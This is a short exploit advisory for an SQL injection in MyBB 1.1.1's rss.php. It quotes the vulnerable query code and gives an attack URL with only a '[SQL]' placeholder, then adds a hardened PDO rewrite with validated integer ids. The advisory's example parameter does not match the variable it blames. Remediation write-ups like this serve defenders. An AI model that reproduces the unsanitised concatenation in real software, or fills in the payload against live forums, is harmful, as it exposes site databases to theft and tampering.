
MyBB v1.1.1 (rss.php) SQL Injection Exploit

----------------------------------
Found By: Breeeeh & CrAzY CrAcKeR
Site: www.alshmokh.com
Email: Breeeeh@hotmail.com
----------------------------------

// rss.php (excerpt): $forumlist is concatenated into the SQL string as-is
$query = $db->query("SELECT * FROM ".TABLE_PREFIX."forums f WHERE 1=1 $forumlist");
$comma = " - ";
while($forum = $db->fetch_array($query))
{
        $title .= $comma.$forum['name'];
        $forumcache[$forum['fid']] = $forum;
        $comma = ", ";
}

----------------------------------

Example:

/rss.php?...$comma=[SQL]
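
A hardened form of the query and loop above, as an added example that is not code from the advisory or from MyBB. It assumes the forum filter arrives as a comma-separated id list; the function names, the PDO/SQLite stand-in for MyBB's $db object, and the sample rows are all constructed for illustration.

```php
<?php
// Added example, not MyBB code. Names, schema and sample data are assumptions.

/** Keep only positive decimal integers from an untrusted comma-separated list. */
function parse_forum_ids(string $raw): array
{
    $ids = [];
    foreach (explode(',', $raw) as $token) {
        $token = trim($token);
        if ($token !== '' && ctype_digit($token) && (int)$token > 0) {
            $ids[(int)$token] = true;   // array keys de-duplicate the ids
        }
    }
    return array_keys($ids);
}

/** Fetch forums; request-derived values reach the database only as bound integers. */
function fetch_forums(PDO $db, array $ids): array
{
    $sql = 'SELECT fid, name FROM forums';
    if ($ids !== []) {
        // Only "?" placeholders are concatenated into the SQL text.
        $sql .= ' WHERE fid IN (' . implode(',', array_fill(0, count($ids), '?')) . ')';
    }
    $stmt = $db->prepare($sql . ' ORDER BY fid');
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE forums (fid INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO forums VALUES (1,'General'),(2,'Support'),(3,'Staff')");

// Constructed request value: two valid ids and two tokens that are dropped.
$ids = parse_forum_ids('1, 3,abc,2 OR 1');

// Same loop as the excerpt, with $title and $comma initialised by the script itself.
$title = 'Forum feed';
$comma = ' - ';
foreach (fetch_forums($db, $ids) as $forum) {
    $title .= $comma . $forum['name'];
    $comma = ', ';
}
echo $title, PHP_EOL;
```

Tokens that fail validation are discarded rather than repaired, so no request text is ever concatenated into the statement.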
